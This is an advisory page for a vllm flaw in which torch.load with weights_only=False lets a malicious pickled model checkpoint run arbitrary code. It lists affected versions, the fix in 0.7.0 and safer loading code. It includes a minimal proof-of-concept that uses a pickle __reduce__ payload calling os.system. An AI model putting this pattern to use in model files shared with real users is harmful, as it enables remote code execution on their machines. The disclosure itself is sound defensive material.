GHSA-rh4j-5rhw-hr54

Source
https://github.com/advisories/GHSA-rh4j-5rhw-hr54
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-rh4j-5rhw-hr54/GHSA-rh4j-5rhw-hr54.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-rh4j-5rhw-hr54
Aliases
Published
2025-01-27T20:50:30Z
Modified
2025-06-30T13:10:11.856498Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator
Details

Description

The file vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load model checkpoints downloaded from Hugging Face. It uses the torch.load function with the weights_only parameter left at its default value of False. As the security warning at https://pytorch.org/docs/stable/generated/torch.load.html notes, when torch.load deserializes malicious pickle data it executes arbitrary code during unpickling.
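
A minimal sketch of this attack class (not taken from the advisory; the file name and payload below are hypothetical): because pickle invokes an object's __reduce__ method during deserialization, a crafted checkpoint loaded with torch.load and weights_only=False can run an arbitrary command.

import os
import torch

class MaliciousPayload:
    # pickle calls __reduce__ while deserializing; the callable it returns
    # is executed, here a harmless echo standing in for an attacker command.
    def __reduce__(self):
        return (os.system, ("echo arbitrary code executed during unpickling",))

# An attacker publishes a "checkpoint" file containing the payload object.
torch.save({"weights": MaliciousPayload()}, "malicious_checkpoint.bin")

# Loading it with weights_only=False (the pre-fix default) triggers the payload.
torch.load("malicious_checkpoint.bin", weights_only=False)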

Impact

This vulnerability can be exploited to execute arbitrary code and OS commands on the machine of a victim who fetches a pretrained model repository from a remote source.

Note that most models now use the safetensors format, which is not vulnerable to this issue.
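
For comparison, a hedged sketch of the safer loading patterns (file names hypothetical): safetensors stores raw tensor data without using pickle, and torch.load with weights_only=True restricts deserialization to tensor types.

import torch
from safetensors.torch import load_file, save_file

state_dict = {"layer.weight": torch.randn(4, 4)}

# safetensors never invokes pickle, so no code can run at load time.
save_file(state_dict, "model.safetensors")
tensors = load_file("model.safetensors")

# For legacy pickle-based checkpoints, weights_only=True rejects arbitrary objects.
torch.save(state_dict, "model.bin")
safe_state_dict = torch.load("model.bin", weights_only=True)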

References

  • https://pytorch.org/docs/stable/generated/torch.load.html
  • Fix: https://github.com/vllm-project/vllm/pull/12366
Database specific
{
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-502"
    ],
    "nvd_published_at": "2025-01-27T18:15:41Z",
    "github_reviewed_at": "2025-01-27T20:50:30Z"
}
Affected packages

PyPI / vllm

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
0.7.0

Affected versions

0.*

0.0.1
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1